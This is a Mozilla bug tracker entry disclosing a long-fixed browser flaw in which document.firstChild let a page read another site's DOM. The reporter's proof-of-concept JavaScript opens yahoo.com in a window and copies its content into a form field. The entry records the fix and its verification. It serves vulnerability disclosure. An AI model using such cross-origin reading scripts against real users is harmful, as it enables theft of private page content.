Closed
Bug 18965
Opened 25 years ago
Closed 25 years ago
document.firstChild vulnerability
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
M14
People
(Reporter: joro, Assigned: norrisboyd)
References
()
Details
document.firstChild exposes the DOM of arbitrary document which at least allows reading documents. The code is: --------------------------------------------------------------------------- function f(o) { var s=''; var i; s = o.nodeValue; if ( o.childNodes ) for ( i = 0; i < o.childNodes.length; i++ ) s += f(o.childNodes[i]); return s; } a=window.open("http://www.yahoo.com","victim"); function g() { document.forms[0].elements[0].value=f(a.document.firstChild); } setTimeout("g()",10000); ---------------------------------------------------------------------------
Assignee | ||
Updated•25 years ago
|
Status: NEW → ASSIGNED
Target Milestone: M14
Assignee | ||
Comment 1•25 years ago
|
||
This is fixed with my Friday night checkin of all.js.
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Windows NT 1999120208 Comm Verified ...'[Exception... "Security error"'...
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in
before you can comment on or make changes to this bug.
Description
•